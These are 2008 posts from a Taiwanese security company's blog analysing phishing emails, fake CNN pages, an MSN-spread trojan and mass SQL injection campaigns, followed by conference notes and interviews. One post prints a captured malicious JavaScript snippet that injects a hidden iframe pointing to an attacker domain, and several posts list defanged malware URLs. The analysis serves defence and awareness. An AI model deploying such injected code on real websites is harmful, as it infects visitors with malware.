阿碼外傳-阿碼科技非官方中文 Blog

2008年8月8日

近來CNN一系列的釣魚郵件及釣魚網站窺探

***首部曲***
主旨:CNN.com Daily Top 10
哇!CNN服務真好,主動寄日報給我耶!要有國際觀先從這開始吧...


有沒有想過為啥CNN會主動寄郵件給你呢?你是不是應該收到呢?你應不應該開啟呢?沒錯!這是釣魚郵件。它結合三大攻擊手法呢?
1.維俏維妙的釣魚郵件內容,可不像一般簡單的幾個字加上一個超連結(URL),以後釣魚郵件的餌會越來越精美。
2.釣魚郵件內的連結(URL)連往詐騙網站(Phishing Website),詐騙網站會給你看似正常的下載,如執行檔(.exe)...等。未來詐騙網站會越來越符合常理判斷,一不小心就...
3.詐騙網站(Phishing Website)還夾帶惡意攻擊碼,會攻擊瀏覽器漏洞,而且還會設法規避偵測。若是0-Day漏洞出現,只能願上帝保佑...

瀏覽惡意連結的網站(hxxp://www.bardaue?.com.br/index2.html,注意瀏覽郵件連結是危險動作),瀏覽畫面如下:


它的攻擊碼在這裡(hxxp://www.bardaue?.com.br/1.html),隱藏的挺好的。還有好幾個規避偵測的技巧在其中。


有沒有好的工具可以分析一下相關連結呢?目前我知道的有四個,如果有人知道其他的網站有,小弟不吝賜教囉!

1.HackAlert:http://hackalert.armorize.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


2.LinkScanner:http://linkscanner.explabs.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


3.Dr.Web:http://online.us.drweb.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


4.Finjan:http://www.finjan.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果:

檢測"hxxp://www.bardaue?.com.br/1.html"結果:


這還不是「魚叉式網路詐騙(Spear phishing)」的郵件喔!想知道啥是「魚叉式網路詐騙」可以參考這裡的微軟網站說明、還有中文維基,這類郵件更難識別一旦被鎖定,得要練就一身好功夫才行。

***二部曲***
原本的釣魚郵件內容已經相當精美了,你會分辨嗎?但之前的釣魚網站卻太遜了,只有CNN的一個小Logo。
這次"CNN.com Daily Top 10"的釣魚網站內容進化了,已經到近乎完美!
URL:hxxp://www.bellomeparrucchieri?.it/cnnnews.html


看出網站的陷阱嗎?
1.當然是URL(Domain)不正確,不是真正的CNN網站,但你又知道正確CNN網站的URL(Domain)嗎?
2."Adobe Flash Player"陷阱,你真的沒安裝嗎?還是安裝了它在誘騙你去安裝?
3.它讓你一定得看到"下載程式"的訊息,不然其他訊息一直跳出來,視窗又關不掉。這是絕招....

前一個畫面點選取消,會出現接下來的畫面,只有確定的選項可以選擇,點選"確定"後又回到前一畫面,逼你一定得選第一畫面的"確定"選項,這時瀏覽器視窗也無法直接關閉。頑強抵抗是沒有用的。


所以一定得到下面訊息,才能關閉。夠狠吧!


你不會已經下載並且執行了吧...XD
這次網站並未夾帶惡意攻擊碼,相信還會在放上來的...

***三部曲***
寄件者:CNN Alerts [tid-sucila@rakcorrosioncontrol.com]
主旨:CNN Alerts: My Custom Alert
內容:
Alert Name: My Custom Alert

Ledger's joker withdrawn from Oscar race
Fri, 8 Aug 2008 11:19:24 +0300

FULL STORY
==================================


看到釣魚郵件的網站連結在哪了吧!看出它的手法了吧!
還有一點呼應首部曲中釣魚郵件的內容哩...顯然有一連串的計畫手法。這惡意連結連到哪呢?相信大家已經猜到了,沒錯,就是二部曲中的釣魚網站。

郵件內容也是相當火熱的連結,搭上今晚奧運開幕的熱門新聞,這也是釣魚郵件需要符合新聞潮流的必要條件,才會使多人容易受騙上當的,魚餌在"FULL STORY"的連結,其他連結都是正常的。這樣的釣魚郵件非常仿真,反垃圾郵件廠商要注意了,因為躲過反垃圾郵件過濾的機率相當高,大家小心...

***還有續集嗎?***
一定會有的,都是換湯不換藥的,更替一下郵件內容、換個釣魚網站、找下一個熱門國際新聞...,新的釣魚郵件及釣魚網站又會出現的,而且會一直躲過反垃圾郵件的過濾的,你能分辨嗎?

作者 Crane 為阿碼科技 資安顧問


繼續閱讀全文...

2008年8月6日

準備去美國駭客年會--Black Hat USA Briefings

終於到了旅館,再過幾小時今年的briefings就要開始了!

阿碼科技過去12個月以來參加了非常多駭客年會和資安年會,從舉辦OWASP Asia 2007照片),參展並派7位同事參加OWASP US 2007照片),參展並派7位同事參加資安產業最大年會RSA 2008,參展並演講於2008世貿資安展,到舉辦並演講於2008 SySCAN亞洲前瞻技術論壇照片),到等一下就會開始的Black Hat 2008,一路著實累積不少心得!

可是也因為這樣,我們發覺一場年會要讓我們興奮的新東西越來越少了。今年如果不是Jeremiah大力推薦,說今年Black Hat跟以往不一樣,特別精彩,我原本是沒有想要來的。所以拖到最後一刻才買機票,訂旅館...

來到旅館後,竟然跟我說over booking,沒有非吸煙房...那還得了,抗議一下之後,免費升級suite(一天貴三百多美金),這還差不多!





時間不多,就快天亮了,趕快把這次為了要blog帶來的裝備整理一下。Black Hat背太多東西很呆,還要帶筆電,所以這次簡配出征,只帶一機三鏡-40D / 24-105L / 10-22L / 100-400L:

開火測試一切正常,四張8G SanDisk,彈藥充足,一切OK!接下來就是最難的了:選今天要聽的talk。



大家會發現,Jeremiah選他今年聽的talk,很多都和他自己做的沒太大關係。其實我們大都這樣,因為跟我們做相關研究的人,我們大都很熟了,他們要講什麼,不是在別場會聽過了,就是早就私底下交換過研究了。一個人一年各大資安年會都講,每一場要生出新的東西,沒那麼容易,其實有時難免都有相當程度的重複。

像是今天第一場要選誰,Jeremiah選Nitesh Dhanjani和Billy K Rios,他對這場talk的評語真是一針見血,可是我今年RSA 2008已經聽過一遍了。

這就是不當speaker的好處。Jeremiah是RSA 2008的speaker,當speaker壓力不小,也會很忙(應付媒體等),所以別人的演講會漏聽很多。我在RSA 2007是speaker,RSA 2008我沒有講,輕鬆許多,聽到比較多場,但是公司有展場,畢竟還是有壓力。

這次純粹來聽演講還有跟這些朋友碰面,又更輕鬆了,真好!

經過一番掙扎,我選了以下的演講:

9:00 -10:00: Keynotes 沒得選

10:00-11:00: Jared DeMott, AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation

11:00 -12:00: Dan Kaminsky, Black Ops 2008: Its The End Of The Cache As We Know It

13:45-15:00: PDP, Client-side Security

15:15-16:30: Robert Hansen (RSnake) & Tom Stracener, Xploiting Google Gadgets: Gmalware and Beyond 可惡題目被你們先講了!

16:45-18:00: Paul Royal, Alternative Medicine: The Malware Analyst's Blue Pill

好,準備出門了,聽完後再跟各位分享!

作者 Crane 為阿碼科技 CEO


繼續閱讀全文...

一切都是在騙人

今天早上收到朋友傳來的MSN,隔沒多久同事也收到類似的訊息,看了一下,原來是透過MSN傳播的惡意程式,實在是個不太稀奇的東西。


那為何會寫這篇blog呢?一切都是人性啊~

就像我總是跟朋友說的:『 社交工程才是王道啊! 』,所以這篇沒有多少技術細節,只是希望給個提醒,希望大家告訴大家(尤其是那些不太有警覺心的親朋好友),不要被騙到了。


這個訊息用了正體中文字,後面竟然還跟上了注音文,嗯嗯,騙人的技巧有進步,以前看到類似的信,用簡體中文不說,語氣也不對,所以比較不容易上當,這是第一個陷阱。

這個連結用到了一些會讓人產生錯覺或是疏忽的字串,例如msn、index.asp、hgtht.jpg等,很多網站都有類似的圖檔連結方式,又是從MSN收到跟"msn"有關的連結,因此順手就點下去了。

這裡就是第二個陷阱,www.tw-msn.com與MSN相關服務根本八竿子打不著,事實上,這個網站還在建設中呢!


點選這個連結後會下載一支名為ilove.scr的程式,附檔名是scr就已經夠怪了,存檔後長這樣:



這是我最愛的陷阱!用folder icon講檔案偽裝成folder,稍一不注意就會點進"folder"裡看看有什麼內容,實在是可愛啊!

最後丟到VirusTotal看看,嗯嗯,前天就有人上傳樣本了。用NSPack加殼過,總共還有25種防毒軟體掃得到,令人意外的是NOD32竟然掃不到,Fortinet也槓龜,這兩家國內的佔有率不低啊。

執行後的行為就不分析了,不是我的專長。(那什麼是我的專長?是唬爛...XD)

病毒、木馬、蠕蟲這些惡意程式也不是第一天出現,透過MSN傳播也很常見,這隻用到的技術也不特別,重點在於它誘使收訊者執行的手段不可輕忽,沒有技術深度,可是只要你有疏忽就會中獎。未來惡意程式技術會不斷進步深入,Packer不斷改進,唯有這社交工程技巧始終利用沒有進步的警覺心,實在是.....太方便啦~~

作者 Wisely 為阿碼科技 產品經理

繼續閱讀全文...

google說的不是我說的

這兩天的新聞:
資安之眼:電子告白信「有毒」! 甜蜜情人節被殭屍病毒纏上
PCHome:電子告白信「有毒」! 甜蜜情人節被殭屍病毒纏上...
大砲開講:七夕情人節駭客來攪局,風暴病毒邀請情人加入殭屍家族
另外還有好幾則新聞都差不多...大意是:
七夕情人節前夕,現代人喜歡用電子mail傳情說愛,但根據趨勢科技最新的Trend Labs統計卻發現,最近有一批由殭屍網路所散播含有惡意連結的垃圾郵件,郵件主旨皆與愛情有關,如:「Stand by my side」、「I want to be with you」 以及 「Lucky to have you」等告白訊息。一旦收件者因為好奇,按下郵件中所附的連結,那可能會是一場夢魘。

忍不住問了google大師,但google卻說:

可以參考此連結
google大師告訴我,2008年6月11日那時就有這手法啦!
這是另一個blog說的:http://blog.trendmicro.com/storm-meddles-in-matters-of-the-heart/
所以...天天都是情人節的啦...

其實這類似手法已經存在一段時間了,也很常見:


都非常類似的,換湯不換藥,把手法說清楚才是重要的,都是用詐騙手法誘拐使用者下載惡意程式,執行後當然植入惡意程式。簡單的手法一變再變,只要畫面炫一點、漂亮些,總是能騙倒一堆人的...

作者 Crane 為阿碼科技 資安顧問

繼續閱讀全文...

歡迎光臨阿碼外傳!

各位好!

我們最近終於有時間把公司的blog架設起來了。阿碼從2006年一月成立到現在,許多朋友都一直建議我們能有公司的blog,但是由於大家都忙,一轉眼就過了兩年半。

最近我們一直覺得大家真的很想多認識我們,大家都知道我們專注於web資安產品,有源碼檢測、web惡意程式偵測、web防火牆等產品,經過兩年,很多都已經是我們的客戶,也熟悉我們的產品,但是對於我們這個團隊,卻很想有更深入的認識。阿碼很特別,團隊很年輕,但是做的是世界頂尖的產品;研發團隊設在台灣,但是除了許多優秀的台灣青年外,也有很多來自美國、加拿大、德國、愛爾蘭、波蘭、西班牙、瑞典、紐西蘭、印度、南非等地的菁英。我們都在研究什麼?我們最近做了哪些新的產品或功能?我們對於資安趨勢的看法?我們參加各地資安年會的心得?那些會議的內容值得去?哪些會議值得贊助?阿碼平均年齡多大?阿碼一天工作多久?阿碼自己的SSDLC如何做?我們收到了各式各樣的問題,讓我們覺得,大家對我們的了解其實很少,其實僅止於我們的產品,所以我們決定,在辦完今年SyScan之後,去BlackHat與OWASP India、OWASP US之前,我們要推出我們大家一起的blog,來與大家分享種種,也記錄阿碼的成長。

可是對於我們來說,推出公司的blog,大家很難寫文章。我們喜歡寫文章,表達自己對很多事的看法,或分享我們所做的研究,但是如果是公司的官方blog,那麼我們的看法,也將間接地代表了公司的看法。可是如果我們因此而多所顧忌,那乾脆不用寫blog,發正式的新聞稿就好了;即使寫了,也將會像很多公司的對外發言一樣,經過了層層的包裝與修飾,留給外界自行設法解讀背後的真相,這樣就完全失去了blog的意義,況且我們都不習慣也不擅長很正式(或說「很官腔」)(或乾脆說「很虛假」、「很噁心」)的表達方式。

所以我們一起決定推出一個很特別的blog。我們希望能透過這個blog讓大家多了解我們,多與我們互動,多與我們分享你們對於我們的看法與建議。這個blog只會由阿碼的團隊來寫,每一篇登出來的文,一定出自一位阿碼的成員,所以它絕對是屬於阿碼的blog。但是我們每個人將代表自己發聲,用自己的語氣,發表自己真實的意見,這些看法僅代表我們個人的看法,不代表公司的立場,所以它雖然是阿碼的blog,但是不是官方的blog,於是乎,「阿碼外傳-阿碼科技非官方Blog」誕生了。

感謝您光臨我們的blog!希望您喜歡我們的分享,也歡迎您多貼您的意見給我們!

Enjoy our blog,
Wayne
2008年八月五日於舊金山

繼續閱讀全文...

2008年8月4日

Mass SQL Injection + Phishing WebSite

因為雲端的威脅,駭客集團註冊的網域(Domain)可以發揮的空間受到壓縮,所以得善盡利用網域,於是結合Phishing WebSite來進行詐騙。駭客集團可能還有秘技來因應雲端的威脅。

先來看看下面幾張圖: (Title is "Mortgagee Union Trust Company")




眼力大考驗,看出哪裡不同嗎?哪裡又是一樣呢?在搞甚麼鬼呢?
1.URL(Domain)不同,分別為。"porv.ru"、"ncbw.ru"、"po4c.ru",這些網域都是Mass SQL Injection攻擊所植入惡意連結的網域。
2.其中"po4c.ru"已經被FireFox 3標示為"已知有害網站"。
3.三個網站內容都是一樣的,是一家銀行。google找一下"union bank"...真多,不知是真的Union Bank很多,還是有一堆是假的,所以用搜尋引擎找銀行是很危險的事

來查查Domain註冊資料:
1.porv.ru...查詢結果
domain: PORV.RU
type: CORPORATE
nserver: ns2.porv.ru. 66.233.229.99
nserver: ns1.porv.ru. 79.184.20.160
nserver: ns3.porv.ru. 68.224.31.128
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
2.ncbw.ru...查詢結果
domain: NCBW.RU
type: CORPORATE
nserver: ns1.ncbw.ru. 75.58.125.164
nserver: ns3.ncbw.ru. 98.223.79.10
nserver: ns2.ncbw.ru. 67.81.36.254
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
3.po4c.ru...查詢結果
domain: PO4C.RU
type: CORPORATE
nserver: ns1.po4c.ru. 67.193.115.136
nserver: ns3.po4c.ru. 67.61.45.63
nserver: ns2.po4c.ru. 69.119.119.178
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 1193323
e-mail: jest1s@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.24
paid-till: 2009.07.24
source: TC-RIPN

今天是2008.08.04,網域申請日期也才沒幾天的事,上面註冊的資料也不會是真的,網域註冊是要付費的,查金流呢?查到的應該是線上刷卡的,通常也是盜刷的。等網域註冊商發現然後再取消該網域,應該也是幾天後的事了,那時駭客集團應該也在註冊另外一批網域了。
想知道還有哪些網域被註冊利用嗎?可以參考:
http://www.dynamoo.com/blog/labels/Asprox.html
http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt

再來看看hxxp://porv.ru/js.js:<有的防毒軟體會將下列程式碼視為惡意程式>
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
docurnent.vvrite(''<\ifrarne src=hxxp://ncbw.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0><\/ifrarne>'');
}
catch(e)
{
};
}}
其中的網域會一直變換的,駭客集團總是有用不完的網域,怪...。如果,網域有特定編碼產生,惡意程式反向連結時可以用動態編碼網域來連結,這可就屌了,現今所謂的「網站信譽評等」、「網站黑名單」機制就宣判死刑。你能想像這天嗎?我相信快了...

作者 Crane 為阿碼科技 資安顧問

本文同步張貼在這個部落格

繼續閱讀全文...

2008年7月18日

一封詐騙的電子郵件

今天一早收到一封郵件:

看起來平淡無奇,檢查超連結也沒有異常,不過就是一封垃圾郵件吧!!

開啟連結畫面(危險動作:點選郵件連結及開啟郵件附件都是危險動作):


懂些電腦的,應該可以看出異常處,但一般人呢??

不攻擊漏洞,純粹用點混淆、欺瞞手法才是攻擊最高招~~
就像魔術一樣,不懂魔術手法的人,只能看好戲~~XD

我當然不能這樣就放過它,要給它剖析一下...
先看一下郵件標題(Header):
Microsoft Mail Internet Headers Version 2.0
Received: from 200.net88.skekraft.net ([213.199.88.200]) by mailserver.co.cn with Microsoft SMTPSVC(x.x.xx.xx);
Fri, 18 Jul 2008 10:26:23 +0800
MIME-version: 1.0
Content-type: multipart/alternative;
boundary="Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)"
Message-id: <1F012145-4DF2-0768-4915-28014035C24A@tweet-garot.com>
From: Halchakar
To: support@mailserver.co.cn
Subject: Alligator attack savages 3 students on school trip
Date: Fri, 18 Jul 2008 04:26:25 +0200
X-Mailer: Apple Mail (2.924)
Return-Path: tmmatsre@tweet-garot.com
X-OriginalArrivalTime: 18 Jul 2008 02:26:24.0077 (UTC) FILETIME=[AC62C7D0:01C8E87D]

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)
Content-type: text/plain; charset=UTF-8; format=flowed
Content-transfer-encoding: 7BIT

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)
Content-type: text/html; charset=UTF-8
Content-transfer-encoding: 7BIT

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)--

寄件信箱-tmmatsre@tweet-garot.com,信箱網域確實存在但沒該帳號信箱,通常寄件者幾乎都是假的。
Hostname mail.tweet-garot.com
MX Priority 10
Results 220 barracuda.tweet-garot.com ESMTP d5a48418eea1c05ff8ac9d4ec4eca22e
Hostname backup-mx.choiceone.net
MX Priority 20
Results 220 bmx002.onecommunications.net ESMTP
寄件IP-213.199.88.200,在瑞典。
City Skellefteå
State/Region 23
Zipcode
Area Code 0
Country SE
Latitude 64.7667
Longitude 20.95

再來看看連結的網站:
schnittstellentechnik.de--解析IP->62.67.235.170
Domain: schnittstellentechnik.de
Nserver: ns1.evanzo.com
Nserver: ns2.evanzo.com
Changed: 2006-12-20T23:34:05+01:00

IP定址:
62.67.235.170@Germany
應該是Web Hosting上面的一個網站

惡意程式:
hxxp://schnittstellentechnik.de/watch.exe

VirusTotal:檢測結果
Result: 13/33 (39.4%)

該網站還夾帶一個攻擊碼,會攻擊IE瀏覽器漏洞,且攻擊碼有經過編碼的:
hxxp://schnittstellentechnik.de/00.html

#社交工程手法絕對是資安管理上的最大風險及弱點。
#Domains及Web Hosting已經被濫用了,這兩個管道能被杜絕,網路威脅將會大減。

作者 Crane 為阿碼科技 資安顧問

繼續閱讀全文...

2008年7月15日

阿碼 & SySCAN 共同主辦前瞻資安技術年會 2008

2008年七月,阿碼SySCAN 聯合在台北舉辦了SyScan 前瞻資安技術年會 2008,我把當初寫的一些東西轉貼在這裡。大會 blog 在這裡:http://syscantaiwan.blogspot.com/
大會照片:
直接前往相簿


講師的訪問 第一回:亞洲與歐美的資安會議比較



問:今年SyScan來到了台灣跟香港,你的看法如何?你覺得什麼樣的會是最酷的會?亞洲的會議,如SyScan、VNSECon、HITB等,你覺得如何?好的資安會議要有什麼樣的要素?

Adam Laurie:

亞洲的會議中,SyScan一直是我的最愛,因為他讓我可以離開歐洲跟美國,我大部分會議的時間都花在這兩個地方。SyScan也是照顧講師照顧得最好的會議。什麼要素構成好的資安會議?當然是內容,因為大家終究還是因為內容才來的...SyScan一直有最好的講師陣容,所以我能夠看到很多東西,學到很多,也認識到很多來自世界各地的頂尖資安專家。這一切讓我覺得參與SyScan是值得的。

但是我當然永遠會更喜歡 DEFCON 跟 BlckHat,因為我創立並參與這兩個會的工作至今超過十年了。另外這兩個會議的規模也比較大。

Matt Conover (Shok):

SyScan擴大了我很高興,SyScan是很好的會議,我已經參加了三次還是四次了。Thomas很好的主辦人,他會安排得很好讓講師很省事。至於其他亞洲的會議如POC、VNSECon、HITB、以及PacSec...我也希望以後能參加到。但是我如果全部都參加了我大概會因為正事都沒做而被公司開除吧! :)

無論如何,亞洲各國都有這些好的資安會議真的很棒,這些會議會培育下一代的資安專家,幫助他們永遠都有最新的資安知識與點子,並建立一個全球性的社群,我們大家可以隨時彼此聯絡並交換意見。這一點是我很喜歡的。我希望世界不要有冷戰的觀念,大家能多交流。

Rick Smith:

我覺得資安會議的擴張是非常好的,這樣更多的人能夠獲得最新的資安知識。我一直認為最好的防禦是從了解攻擊開始的,不懂得攻擊方法,要如何防禦?直於最酷的資安會議,這題很難!我在世界各地的資安會議都有演講,我覺得他們每個都有不同的好處。他們在世界各地舉辦,這表示我能接觸到世界各地的資安社群,大家成為一個全球的社群,這對我是無價的,也幫助我在 HP 的研究。小的會議,例如在維也納的 DeppSec 或者在英國的 BrumCon,可以跟小群人有很深入的討論;大型的會議如 BlackHat 跟 DEFCON 很有價值因為規模很大,同時有很多不同的主題可以選擇。這次參加SyScan,使我第一次來到亞洲,我很期待聽到亞洲講師的演講,並學到新的東西。

Fyodor Yarochkin:

我覺得台灣的資安社群似乎不是很國際化(non-internations),對於跟國外的資安社群交流似乎不是很有興趣。我不知道這是語言的或心裡障礙。還有這邊似乎大家比較不願意分享自己的研究,大家都想要有自己的團體,自己的project,自己的技術...但是分享是駭客文化中很重要的元素。

講師的訪問 第二回:世界越來越安全,還是不安全?



原始問題:With so many experiences and years in security research, where do you see security, in general, is heading today? Are we getting more secure, or insecure?

Adam Laurie:

很遺憾的,我必須說我們越來越不安全。這一方面是單純從量來看,現在我們接觸的科技(technology)太多了,每一種新的科技都會帶來新的資安問題;另一方面則是這些科技被商業上採用的速度。由於需要很快在商場上使用,每每資安的環節變成是最不重要的考量,常常是最後時刻才加上去的,也常常沒有經過仔細的思考,而事實上,資安機制應該是設計私人資訊系統(personal information systems)或付費系統時最重要的考量。

Internet上執法困難,每天高量的攻擊,數不完的弱點,跨管轄區域的不法行為,政府贊助的駭客團體,botnets以及靠botnets所支撐的地下經濟,SPAM,病毒,惡意程式,身份竊盜,釣魚,信用卡偽造,以及電子恐怖(cyber terrorism)對於基礎建設所帶來的威脅,再再都顯示,未來的危險重重。

除非我們目前偵測與防範資安問題的作法有超大幅的改變,我看不出情勢會有好轉的可能。

另一個嚴重的問題是,法律目前被扭曲以便讓有爛資安產品(poor security products)的廠商能夠獲利。另外,用法律禁止「逆向工程」(reverse-engineering)、駭客(hacking)、以及弱點的公布(disclosure)等,最後只會讓情勢惡化,而不會有任和幫助。因為這些法律,只會讓合法的資安研究員害怕去研究目前科技的漏洞,也害怕去公開這些漏洞,這樣的結果,就是這些漏洞會一直存在,讓那些台面下的不法份子持續利用。


Matt Conover (shok):


哈,這是一個很棒的問題。這個世界現在比以前都依賴電腦和Internet了。當然這確保我們資安研究員都會有飯吃(資安研究永遠需要),但是其實這有很負面的影響。今天我看到兩個極端負面的現象:

一、越來越多的駭客行為的動機是源自於利益。Internet已經變成一個非常恐怖的世界了。一般的Internet使用者,隨時都被釣魚或其他詐騙手法轟炸,要偷他們的銀行、eBay、或PayPal帳號。同樣嚴重的事,使用者被暴露在充滿惡意網站的環境,惡意的網站,惡意的廣告,或者原本合法善意的網站,但是被駭入並植入了惡意的網馬(掛馬)。

這些被植入的網站,會悄悄地設法在訪客的系統中安裝惡意程式,偷竊個人資料或把訪客的電腦變成僵屍網路的成員。駭客越來越先進了,有錢能使鬼推磨,所以我覺得資安界還有很長的路要走。

二、資安研究越來越被泛政治化。我們這行的一些行為現在竟然被認為是違法的了(美國的DMCA,在德國攜帶攻擊程式屬犯法,在法國使用加密軟體犯法...)。國與國之間常常控告對方國家執行駭客攻擊行為(俄羅斯 vs. 愛沙尼亞,中國 vs. 美國/德國...)。我擔心在網路世界(cyberspace)裡會開始發展出冷戰效應。對於我這個從青少年就因為純興趣而開始入行的資安研究員來說,這些改變讓我心寒。

Rich Smith:

資安範圍很大,這個問題不容易做整體性的回答。但是隨著我們日益依賴科技,科技濫用所導致的危險也隨之提升。無可置疑的,對於科技所帶來的危險,今天我們比往前要了解得多。只要我們保有開放的資安議題討論環境可以讓我們很公開的、真實的討論資安的種種議題(例如SyScan),那我覺得我們就會一直有進步。科技進步多快速,相對的資安問題的產生也就會有多快速,因為資安問題與新的科技是結合在一起的。所以我們越快知道一個科技的弱點,我們就能夠越早停止向現在這樣,把資安當作是事後彌補的事情,而在設計階段就加入資安的考量。

這是我看到目前我們面臨的最大挑戰,我們必須認識,資安是發展科技所必須付出的代價,資安不是我們事後靠一些解決方案就可以很便宜的彌補的。

Fyodor Yarochkin:

我對於整個資安大環境並不是很樂觀。隨著越來越多新的科技產生,而越來越少人真的懂資安,整個情勢一定是越來越糟的。尤其是大公司的目的不見得是「讓明天會更好」,加上龐大(龐...
大!!)的地下經濟的起飛:攻擊程式的買賣,惡意程式植入服務,僵屍網路的租賃服務...等等。

我個人意見,目前資安世界很有趣,可是說是兩個極端的面向。一方面,我們有光鮮亮麗的資安產業,有著好多漂亮的防火牆,入侵偵測系統,生物識別系統等等,但是另一方面,我們有著黑暗的地下面--使用者都是僵屍網路的一員,在他們的電腦上執行著僵屍或惡意程式;市場上什麼都可以用錢買到,政府的監控,非法的資安研究...;被入侵的企業打死不會承認...

講師Fyodor:我將公開適合台灣使用的RFID駭客工具


BlackHat / DefCon 創辦人之一的Adam Laurie將擔任本會講師,公開他的RFID駭客工具。來自俄羅斯的Fydor,也將在本會上公開的他最近研發的私房RFID駭客工具。

Adam所用的RFID讀卡機(reader)是在歐洲買的,走PC/SC規格,但是這種讀卡機在台灣比較難買到。Fyodor所使用的是我們台灣本地製造的讀卡機,走的是GIGA-TMS規格。這種讀卡機跟PC通訊所用的是GNetPlus協定。Fyodor寫了自己的工具可以暴力法解MIFARE卡的key--台灣很多卡都是用MIFARE,例如我們的捷運就是。很多購物中心/百貨公司的集點卡也都是。

Fyodor會當場用台灣的某某卡做示範。

最後報告到場的長官們,這種示範在 BlackHat/DEFCON 很常見,沒有像 Adam 那樣拿護照來直接試,已經非常乖了 :)

在 Adam 前面講 RFID,如果沒帶點實際的 demo,豈不遜爆了?

至於Adam 的工具請參考:

http://eecue.com/log_archive/eecue-log-726-Black_Hat_2007___Day_2___Adam_Laurie.html

http://rfidiot.org

CNET: 亞洲資安大會將首度來台 揭最新攻擊手法


http://www.zdnet.com.tw/news/software/0,2000085678,20130365,00.htm

ZDNet記者馬培治/台北報導 2008/07/02 20:10:04

以亞洲地區資訊安全議題為核心的資安大會SyScan,下週(7/7)將首次來台舉辦兩天,來自歐美等地的資安專家將齊聚,介紹最新的攻擊手法。
過去只在新加坡舉辦的亞洲前瞻資安技術年會(Symposium on Security for Asia Network),今年將首度來台舉辦分會,會中將有來自賽門鐵克、HP、COSEINC等國際知名資安公司派出的資深研究員發表最新攻擊手法與漏洞,與本地資安研究社群進行交流。

曾因利用飯店電視駭入客房資訊系統而聞名的專業駭客Adam Laurie便將首次造訪台灣,發表他近年來關注的RFID安全漏洞。Laurie在電子郵件專訪中表示,廣受歡迎的RFID應用雖然方便,但採用者卻未正視其安全問題。他舉例道,許多RFID方案被用在錯誤的方法上,例如門禁管理,便是誤把作為身份辨識功能的標籤拿來當作認證標籤,「多數標籤很容易複製,若沒有密碼等第二層認證系統來把關,把RFID用在認證上其實並不安全,」Laurie說。

而台灣眾多的硬體設備廠商可能會相當關心HP系統安全實驗室研究員Richard Smith將發表的、針對嵌入式系統發動的永久性阻斷服務攻擊(Permanent Denial of Service, PDOS)。

Smith在電子郵件訪問中表示,可透過連網進行flash記憶體上的軔體遠端更新的嵌入式設備,都可能存在PDOS漏洞,讓駭客利用遠端更新機制來破壞其flash記憶體,造成設備無法使用。

而賽門鐵克研究實驗室首席工程師Matthew Conover則將介紹該公司最新研發、用來觀察rootkit行為的沙盒(sandbox)技術,可限制惡意程式的行為僅在sandbox環境中執行,他並將在大會上首次展示該技術。

負責籌辦本次台灣SyScan的阿碼科技執行長黃耀文表示,台灣地區有相當活躍的資安研究社群,但一直以來缺乏與國際級資安專家互動的機會,透過引進SyScan至台灣舉辦,將有助於促進跨國資安研究社群的對話,「台灣的研究人員或許沒辦法去歐美參加BlackHat、DefCon等盛會,但也有機會聽到同等級講者的經驗,」他說。

資安人雜誌專訪 Matt Conover (shok)


我覺得參加會議前,先認識講師很重要。台灣的講師大家都比較熟,國外的大家比較陌生些,感謝資安人雜誌的專訪!

「過去一年以來 在個人研究領域上的轉變有很大的原因是,惡意軟體每年的增長速率已經快要趕上天文數字,以病毒碼或特徵值作為依據的廠商感受到很大的壓力,...」

「對我個人而言,目前研究如何偵測及移除rootkit是一個很現實的問題,像是之前Peacomm、Rustock、 Mebroot這些有rootkit功能的惡意程式,Mebroot是隱藏在MBR開機區的rootkit,...」

「所以,亞洲的資安問題肯定與全世界是有所差異的。而且在資安社群(info-security community)應該是有存在沒有經常交流溝通的事實,在亞洲很有名的資安專家或駭客,到了西方國家似乎就沒這麼有名,...」

「雖然亞洲與東歐地區在資安"黑市" 似乎發展蓬勃,許多複雜的惡意程式及rootkit都是出自亞洲地區,原因可能是因為沒有足夠的法律約束以及合法的資安企業來雇用這些高手,讓他在正確的地方發揮...」

http://www.informationsecurity.com.tw/article/article_detail.aspx?aid=4480

ITHome:亞洲資安技術年會SyScan首度擴大在台舉辦


http://www.ithome.com.tw/itadm/article.php?c=49744
文/趙郁竹 2008-07-07

SyScan標榜會議特色在於探討具前瞻性的資安技術,其中RFID安全、手機、嵌入式系統的安全議題都是首日活動的重點。

以往僅在新加坡、泰國等地舉辦的亞洲資安技術年會SyScan今年首次將規模擴大至台灣、香港,今天(7/7)展開首天議程,吸引約350名台灣資安人員參加。RFID、嵌入式系統安全都是此次會中焦點。

